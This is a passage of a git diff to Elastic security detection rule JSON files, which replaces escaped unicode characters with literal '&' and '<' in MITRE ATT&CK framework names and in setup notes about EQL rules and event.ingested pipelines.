add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_106.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_106.json index 46ef23a7294..ea32eb66d38 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_106.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_107.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_107.json index b7d3c4aa4b2..41cd90c2bdb 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_107.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_204.json b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_204.json index e5a7cc0026c..1849f78dd03 100644 --- a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_204.json +++ b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_204.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_205.json b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_205.json index 3812fcb8cd6..362407a5155 100644 --- a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_205.json +++ b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_205.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_206.json b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_206.json index 7bd1621e6e0..44b91788a7b 100644 --- a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_206.json +++ b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_206.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_102.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_102.json index 17dcb5402e5..048a1310d41 100644 --- a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_102.json @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_103.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_103.json index 5e851271641..0900084300a 100644 --- a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_103.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_104.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_104.json index cbfac92027d..20b481b65e3 100644 --- a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_104.json @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_105.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_105.json index cea077b90e6..88e1ce0b9da 100644 --- a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_105.json @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_105.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_105.json index 27a6d26daca..bb91d6eafb8 100644 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_106.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_106.json index ef5b7575665..f9fd2f31bf7 100644 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_107.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_107.json index ed93b4a0476..76afd644a4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_208.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_208.json index dc75ebb5dd1..687baa96311 100644 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_208.json +++ b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_103.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_103.json index 11dcce7dfe4..d5ffc2cf3a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_103.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_103.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_104.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_104.json index 1c1ef7092a5..731376f17df 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_104.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_104.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_105.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_105.json index 0e96e994059..a583e50f0dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_105.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_105.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_106.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_106.json index e311eeda443..37f0ba1db4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_106.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_106.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_107.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_107.json index 6d472f1f997..60e4d910b50 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_107.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_107.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_105.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_105.json index b6a8b6637f0..cc8384f0b84 100644 --- a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_2.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_2.json index 8d8a1c77fe3..9b8eecda98f 100644 --- a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_2.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_3.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_3.json index 12fb0140f7c..4e1f6f95be3 100644 --- a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_3.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_4.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_4.json index 009e9647889..af824866d49 100644 --- a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_4.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_104.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_104.json index cb10b9e57c7..3ea039418a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_104.json +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_104.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_105.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_105.json index 62c42b957bd..2d236ad28e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_105.json +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_105.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_106.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_106.json index 1d4985c60cd..cdb6ee28270 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_106.json +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_106.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_107.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_107.json index 0cf5386e45a..f877da9552b 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_107.json +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_107.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_102.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_102.json index dedee4e5ec1..9ec1b054b83 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_103.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_103.json index 4d4734a3883..711a453f532 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_104.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_104.json index 2830d727c1d..9c58f9c2309 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_205.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_205.json index 78084b8514a..aa4c4c128d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_205.json +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_103.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_103.json index ffe0c21ea51..ad573e2a465 100644 --- 